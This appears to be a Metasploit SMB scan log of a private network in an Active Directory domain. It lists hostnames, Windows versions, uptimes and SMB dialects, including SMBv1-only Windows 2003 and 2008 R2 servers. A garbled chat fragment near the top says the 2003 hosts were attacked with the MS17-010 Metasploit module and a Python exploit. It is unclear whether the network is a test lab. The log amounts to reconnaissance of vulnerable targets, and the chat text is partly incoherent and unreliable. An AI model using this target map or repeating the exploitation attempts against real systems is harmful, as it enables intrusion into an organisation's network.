[*] 172.16.200.74:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{8812df22-8cb9-43ac-b0c3-2a9815aac072} (authentication domain:AD)
[+] 172.16.200.74:445 - Host is running Windows 10 Education (build:19041) (name:LOKI) (domain:AD)
Why all of a sudden? @tl2 isn't it a juice or testlab? so you can import it yourself and I'll send you more info from AIS so you can work with it by hand but there's no tpsh) yeah I didn't go thereconmille the same thing but you can check other versions yourself there 2003 x2 I poked there with standard msf ms17 and python from git, both bypassed `` ``
[*] 172.16.55.49:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 9m 34s) (guid:{7c383e10-996e-472a-b2aa-1e72646b4596}) (authentication domain:AD)
[+] 172.16.55.49:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:TRACS) (authentication domain:AD)
[*] 172.16.59.203:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{ce97f21a-cd6b-417d-ad36-abafcb01b5f7} (authentication domain:AD)
[*] 172.16.61.150:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{1022c256-f8a7-43ea-43ea-bb83-d62c4131cf2a}) (authentication domain:AD)
[+] 172.16.61.150:445 - Host is running Windows 10 Education (build:19042) (name:MNT-12514) (domain:AD)
[*] 172.16.61.44:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{19c87015-5ea6-4695-b77b-85b63da84f3f}) (authentication domain:AD)
[*] 172.16.60.210:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{302495d4-e3f6-4b27-8f0d-11fb7461aade}) (authentication domain:AD)
[*] 172.16.61.178:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{08a5a5a814-d91b-4946-805a-0e425bffdcb8}) (authentication domain:AD)
[+] 172.16.61.178:445 - Host is running Windows 10 Education (build:19042) (name:LRC-14419) (domain:AD)
[*] 172.16.61.179:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{c83ae93f-d1dd-4696-8381-deb1c79cdbd4}) (authentication domain:AD)
[*] 172.16.63.21:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{a64a8a8d-c473-40ad-b107-4af9d32216e7}) (authentication domain:AD)
[*] 172.16.64.151:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 2d 23h 45m 23s) (guid:{f80450d7-cbcf-41f8-9c21-3bda38a5c579}) (authentication domain:AD)
[+] 172.16.64.151:445 - Host is running Windows 8.1 Enterprise (build:9600) (name:LRC-MCNA-13566) (domain:AD)
[*] 172.16.66.247:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{aa361949-4423-4d0a-99c3-950aeeb714e5} (authentication domain:AD)
[*] 172.16.68.102:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{cfcbdaf9-daf5-4f46-85c4-5c730200d569}) (authentication domain:AD)
[*] 172.16.68.169:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{16c0335d-9b75-47d1-82eb-2092a5a0500e}) (authentication domain:AD)
[*] 172.16.68.196:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{eccd62c2-f977-4bd1-9e7d-dc0b2204d738}) (authentication domain:AD)
[+] 172.16.68.196:445 - Host is running Windows 10 Education (build:19042) (name:LRC-14417) (domain:AD)
[*] 172.16.69.212:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{127b1da6-d6be-49cb-ac45-f25b4d9ddee7}) (authentication domain:AD)
[*] 172.16.100.79:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 172.16.100.79:445 - Host is running Windows 2003 (build:3790) (name:CALLPILOT) (workgroup:WORKGROUP)
[*] 172.16.100.133:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4w 4d 18h 38m 3s) (guid:{eb2f1d4e-2ebb-44d1-9fe2-1425f91aa2c0} (authentication domain:AD)
[+] 172.16.100.133:445 - Host is running Windows 2016 Datacenter (build:14393) (name:NOVA) (domain:AD)
[*] 172.16.200.19:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 172.16.200.19:445 - Host is running Windows 2003 SP2 (build:3790) (name:TMA) (workgroup:IT)
[*] 172.16.200.21:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 3d 5h 41m 15s) (guid:{a88f1f08-39da-4f86-8fbe-9711835eebde}) (authentication domain:AD)
[+] 172.16.200.21:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RE) (domain:AD)
[*] 172.16.200.22:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4w 2d 9h 58m 53s) (guid:{3bef3cb5-3c8c-4df1-8e46-eea0f465c181}) (authentication domain:AD)
[+] 172.16.200.22:445 - Host is running Windows 2016 Datacenter (build:14393) (name:RUDY) (domain:AD)
[*] 172.16.200.24:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:3d 0h 25m 11s) (guid:{16793b91-1bf3-416b-af2e-bd1fee48ac07}) (authentication domain:AD)
[+] 172.16.200.24:445 - Host is running Windows 2016 Datacenter (build:14393) (name:ATLANTIS) (domain:AD)
[*] 172.16.200.39:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:36w 1d 22h 23m 15s) (guid:{6e43de8c-8f97-4442-b757-ddbb9d3807a2) (authentication domain:AD)
[+] 172.16.200.39:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:LISTSERV) (authentication domain:AD)
[*] 172.16.200.46:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 32m 6s) (guid:{7c383e10-996e-472a-b2aa-1e72646b4596}) (authentication domain:AD)
[+] 172.16.200.46:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:TRACS) (authentication domain:AD)
[*] 172.16.200.49:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 53m 51s) (guid:{8de2b5f8-04f3-4ee5-8539-77b6c1fa8942}) (authentication domain:AD)
[+] 172.16.200.49:445 - Host is running Windows 2016 Datacenter (build:14393) (name:ZUUL) (domain:AD)
[*] 172.16.200.50:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:11w 4d 21h 41m 40s) (guid:{879cd9e0-1172-49d5-842d-2added5b8621}) (authentication domain:AD)
[+] 172.16.200.50:445 - Host is running Windows 2016 Datacenter (build:14393) (name:THANOS) (domain:AD)
[*] 172.16.200.55:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:3d 0h 26m 33s) (guid:{16793b91-1bf3-416b-af2e-bd1fee48ac07}) (authentication domain:AD)
[+] 172.16.200.55:445 - Host is running Windows 2016 Datacenter (build:14393) (name:ATLANTIS) (domain:AD)
[*] 172.16.200.56:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 172.16.200.56:445 - Host could not be identified: Unix (Samba 3.0.10)
[*] 172.16.200.60:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{68637261-7669-7365-0000-000000000000) (authentication domain:AD)
[*] 172.16.200.59:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (guid:{696c6f67-7461-0068-0000000000000000}) (authentication domain:AD)
[*] 172.16.200.59:445 - Host could not be identified: QTS (Samba 4.0.25)
[*] 172.16.200.67:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{daa76305-ec4c-4d2d-b99d-748ea91132f3} (authentication domain:AD)
[+] 172.16.200.67:445 - Host is running Windows 10 Education (build:18363) (name:THOR) (domain:AD)
[*] 172.16.200.100:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.16.200.100:445 - Host could not be identified: OS400 V5R4M0 (iSeries Support for Windows Network Neighborhood)
[*] 172.16.200.74:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{8812df22-8cb9-43ac-b0c3-2a9815aac072} (authentication domain:AD)
[+] 172.16.200.74:445 - Host is running Windows 10 Education (build:19041) (name:LOKI) (domain:AD)
[*] 172.16.200.101:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:52w 4d 6h 8m 15s) (guid:{ffe9db1f-c2b1-4433-8286-bb0c50be8973}) (authentication domain:AD)
[+] 172.16.200.101:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:NVR2) (authentication domain:AD)
[*] 172.16.200.79:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 49m 53s) (guid:{8768f9fd-5b33-4161-bc41-df381fb91dea}) (authentication domain:AD)
[+] 172.16.200.79:445 - Host is running Windows 2016 Datacenter (build:14393) (name:NILES) (domain:AD)
[*] 172.16.200.103:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:15h 18m 30s) (guid:{f7a0fe69-c8c0-4c2e-91b8-2f8206eeb4d1}) (authentication domain:AD)
[+] 172.16.200.103:445 - Host is running Windows 2016 Datacenter (build:14393) (name:CASTOR) (domain:AD)
[*] 172.16.200.111:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:52w 4d 6h 4m 27s) (guid:{5fa9f132-da1d-4da5-959d-30a163e4a96e}) (authentication domain:AD)
[+] 172.16.200.111:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:ATLANTIS-OLD) (authentication domain:AD)
[*] 172.16.200.114:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:41w 5d 20h 16m 2s) (guid:{c997f858-6336-4daf-8a72-42a0c336c8e7}) (authentication domain:AD)
[+] 172.16.200.114:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:SOTER) (domain:AD)
[*] 172.16.200.123:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:52w 5d 4h 58m 9s) (guid:{b97c73ad-034b-4542-bb1c-8d5469345961}) (authentication domain:AD)
[+] 172.16.200.123:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:NETSIGHT) (authentication domain:AD)
[*] 172.16.200.128:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:21w 5d 22h 58m 41s) (guid:{ef0f8052-96a4-4118-a393-f97ef8e04381}) (authentication domain:AD)
[+] 172.16.200.128:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-COLL-APP) (authentication domain:AD)
[*] 172.16.200.122:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:4w 5d 22h 0m 2s) (guid:{242103e3-c92f-474d-95de-b2a20178aaa7}) (authentication domain:AD)
[+] 172.16.200.122:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:SHIELD) (authentication domain:AD)
[*] 172.16.200.129:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:27w 0d 19h 40m 23s) (guid:{9c9f440c-97d1-4cf8-bdcf-003e91fded92}) (authentication domain:AD)
[+] 172.16.200.129:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-COLL-TEST) (domain:AD)
[*] 172.16.200.130:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 4d 5h 45m 36s) (guid:{4e0c19a4-4078-46f8-b492-26b3d3dcc692}) (authentication domain:AD)
[+] 172.16.200.130:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-WEBUI-PROD) (domain:AD)
[*] 172.16.200.132:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 5h 47m 28s) (guid:{08335653-32dd-4c54-831a-735e7725f87e}) (authentication domain:AD)
[+] 172.16.200.132:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-COLL-APPDB) (authentication domain:AD)
[*] 172.16.200.133:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 6h 12m 59s) (guid:{e6da55ec-260c-4d42-bf98-91d4d47b6d71}) (authentication domain:AD)
[+] 172.16.200.133:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-COLL-TESTDB) (authentication domain:AD)
[*] 172.16.200.139:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 5h 46m 44s) (guid:{ebb407e8-d089-40c7-87a3-4dbf11b58c18}) (authentication domain:AD)
[+] 172.16.200.139:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-DROA-DB) (authentication domain:AD)
[*] 172.16.200.140:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:14w 5d 19h 52m 3s) (guid:{5d2ad53d-09fe-4fb8-8e9b-48dc8396f1c1}) (authentication domain:AD)
[+] 172.16.200.140:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-DROA-APP) (authentication domain:AD)
[*] 172.16.200.147:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:25w 5d 0h 54m 31s) (guid:{cee00f93-7579-40f0-8a43-677a91c17e71}) (authentication domain:AD)
[+] 172.16.200.147:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-UI-TEST) (domain:AD)
[*] 172.16.200.149:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 6h 16m 48s) (guid:{c46e64fa-d123-4ff9-8fe6-217855cd2163}) (authentication domain:AD)
[+] 172.16.200.149:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-WEBAD-TEST) (domain:AD)
[*] 172.16.200.157:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 5h 48m 20s) (guid:{512a6ea3-c927-4cf7-8fe3-947edc01fbb8}) (authentication domain:AD)
[+] 172.16.200.157:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EZPAY) (authentication domain:AD)
[*] 172.16.200.162:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 16h 36m 17s) (guid:{a0c16382-7c20-4c2a-aaf9-722c0a9aac21}) (authentication domain:AD)
[+] 172.16.200.162:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-SS-TEST) (authentication domain:AD)
[*] 172.16.200.164:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 19h 36m 28s) (guid:{b069c426-2917-46b2-9848-17f5b4f2ae3f) (authentication domain:AD)
[+] 172.16.200.164:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-1) (authentication domain:AD)
[*] 172.16.200.165:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:12w 6d 21h 11m 55s) (guid:{8b51e9d5-c4f3-468d-9016-ac868929551c}) (authentication domain:AD)
[+] 172.16.200.165:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-2) (authentication domain:AD)
[*] 172.16.200.166:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5w 3d 0h 11m 21s) (guid:{8d1b2b4e-fa50-48c5-bebd-612a00c9ca68}) (authentication domain:AD)
[+] 172.16.200.166:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-3) (authentication domain:AD)
[*] 172.16.200.167:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:4d 5h 56m 21s) (guid:{496b0655-8b75-408e-9fd8-ab6fae7860f6}) (authentication domain:AD)
[+] 172.16.200.167:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-DB) (authentication domain:AD)
[*] 172.16.200.170:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 3m 42s) (guid:{db30dc9d-d540-40d1-8d69-8097486d7b52}) (authentication domain:AD)
[+] 172.16.200.170:445 - Host is running Windows 2016 Datacenter (build:14393) (name:LF-FORMS) (domain:AD)
[*] 172.16.200.172:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5w 3d 2h 39m 0s) (guid:{c12b2df9-e1c6-4069-987b-dccc2a471647}) (authentication domain:AD)
[+] 172.16.200.172:445 - Host is running Windows 2016 Datacenter (build:14393) (name:YONDER) (domain:AD)
[*] 172.16.200.174:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 3h 48m 35s) (guid:{328035ff-a3cf-4af6-b6aa-15c8741b1954}) (authentication domain:AD)
[+] 172.16.200.174:445 - Host is running Windows 2016 Datacenter (build:14393) (name:CERBERUS) (domain:AD)
[*] 172.16.200.183:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 54m 41s) (guid:{64e53680-fa39-43c8-8f8e-709f22e8dddd}) (authentication domain:AD)
[+] 172.16.200.183:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:SCANTRON-PS) (authentication domain:AD)
[*] 172.16.200.184:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 48m 23s) (guid:{598b41e0-98da-4443-8b3a-50f68af69fe8}) (authentication domain:AD)
[+] 172.16.200.184:445 - Host is running Windows 2016 Datacenter (build:14393) (name:SCCM) (domain:AD)
[*] 172.16.200.185:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5d 3h 57m 31s) (guid:{07b1d031-4dd2-4379-ad87-49bbec017527}) (authentication domain:AD)
[+] 172.16.200.185:445 - Host is running Windows 2016 Datacenter (build:14393) (name:TMS) (domain:AD)
[*] 172.16.200.188:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5w 2d 6h 16m 46s) (guid:{d7e060be-5b89-4fb2-aed1-447aa4efd919}) (authentication domain:AD)
[+] 172.16.200.188:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-APP) (domain:AD)
[*] 172.16.200.189:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:4d 6h 1m 56s) (guid:{4a5974d5-91df-4368-9e7c-fe3d5672650c}) (authentication domain:AD)
[+] 172.16.200.189:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-ASYNC) (authentication domain:AD)
[*] 172.16.200.191:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:12w 6d 17h 18m 49s) (guid:{d89d0ba7-60a3-4343-8014-cc2599518052}) (authentication domain:AD)
[+] 172.16.200.191:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-DB) (authentication domain:AD)
[*] 172.16.200.192:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5w 5d 17h 21m 14s) (guid:{de310876-e6e9-4c88-98f3-8115cd355a33}) (authentication domain:AD)
[+] 172.16.200.192:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-TESTAPP) (domain:AD)
[*] 172.16.200.194:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 49m 33s) (guid:{9232b025-468c-4299-a42a-b3d907087a20}) (authentication domain:AD)
[+] 172.16.200.194:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-TESTDB) (domain:AD)
[*] 172.16.200.201:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:8w 4d 22h 43m 14s) (guid:{4554f05b-d2bb-4360-8865-ddbe7471fc85}) (authentication domain:AD)
[+] 172.16.200.201:445 - Host is running Windows 2016 Datacenter (build:14393) (name:BAILEY) (domain:AD)
[*] 172.16.200.203:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{e99ea7d1-5c89-4ae0-b047-78f326de10d8} (authentication domain:AD)
[*] 172.16.200.206:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5d 5h 5m 47s) (guid:{e0c5eab0-e28b-4a1d-b71a-025035e36430}) (authentication domain:AD)
[+] 172.16.200.206:445 - Host is running Windows 2016 Datacenter (build:14393) (name:TERMINUS) (domain:AD)
[*] 172.16.200.210:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:2d 12h 1m 14s) (guid:{a847ccbe-32a9-4d56-a2d5-ca2953739b62}) (authentication domain:AD)
[+] 172.16.200.210:445 - Host is running Windows 2016 Datacenter (build:14393) (name:COLL-API) (domain:AD)
[*] 172.16.200.214:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5d 4h 6m 26s) (guid:{216b6279-4ffe-430a-9444-0d091cdaa779}) (authentication domain:AD)
[+] 172.16.200.214:445 - Host is running Windows 2016 Datacenter (build:14393) (name:CROA-DB) (domain:AD)
[*] 172.17.6.9:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.6.7:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.9.6:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.9.7:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.9.39:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{70db2ac9-f957-4efe-a7b4-7287b42b2b59}) (authentication domain:AD)
[*] 172.17.10.36:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{faa6e913-de51-4214-9e63-459d17dd919a}) (authentication domain:AD)
[*] 172.17.10.2:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.10.3:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.2:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.3:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.5:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.6:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.7:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.10:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.11:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.16:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.17:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.18:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.19:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.20:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.22:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.23:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.24:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.25:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.26:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.27:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.28:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.29:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.30:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.31:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.32:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.33:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.34:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.35:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.37:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.38:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.39:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.40:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.41:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.42:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.44:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.43:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.45:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.46:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.47:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.48:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.49:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.50:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.51:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.52:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.53:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.54:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.55:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.57:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.59:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.60:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
